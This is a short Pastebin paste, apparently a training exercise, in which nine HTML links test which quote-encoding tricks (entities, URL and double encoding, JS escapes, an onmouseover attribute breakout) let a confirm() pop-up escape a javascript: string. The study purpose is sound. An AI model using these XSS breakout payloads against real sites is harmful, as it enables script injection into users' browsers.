SHARE
TWEET

XSS Practice

a guest Jun 3rd, 2016 93 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Copy-Paste the following code in http://htmledit.squarefree.com/ and find out which click works or not ...
  2.  
  3. <a href="JavaScript:parent.fancy_close('injection-here');">A quick exercise: Find out which click results in a pop-up?</a>
  4. <br/>
  5. <br/>
  6. <a href="JavaScript:parent.fancy_close(''-confirm`1`-'');">one</a>
  7. <br/>
  8. <br/>
  9. <a href="JavaScript:parent.fancy_close('&apos;-confirm`2`-&apos;');">two</a>
  10. <br/>
  11. <br/>
  12. <a href="JavaScript:parent.fancy_close('&#x27;-confirm`3`-&#x27;');">three</a>
  13. <br/>
  14. <br/>
  15. <a href="JavaScript:parent.fancy_close('&#39-confirm`4`-&#39');">four</a>
  16. <br/>
  17. <br/>
  18. <a href="JavaScript:parent.fancy_close('%27-confirm`5`-%27');">five</a>
  19. <br/>
  20. <br/>
  21. <a href="JavaScript:parent.fancy_close('%2527-confirm`6`-%2527');">six</a>
  22. <br/>
  23. <br/>
  24. <a href="JavaScript:parent.fancy_close('\x27-confirm`7`-\x27');">seven</a>
  25. <br/>
  26. <br/>
  27. <a href="JavaScript:parent.fancy_close('\u0027-confirm`8`-\u0027');">eight</a>
  28. <br/>
  29. <br/>
  30. <a href="JavaScript:parent.fancy_close('"onmouseover=confirm`9`//');">nine</a>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top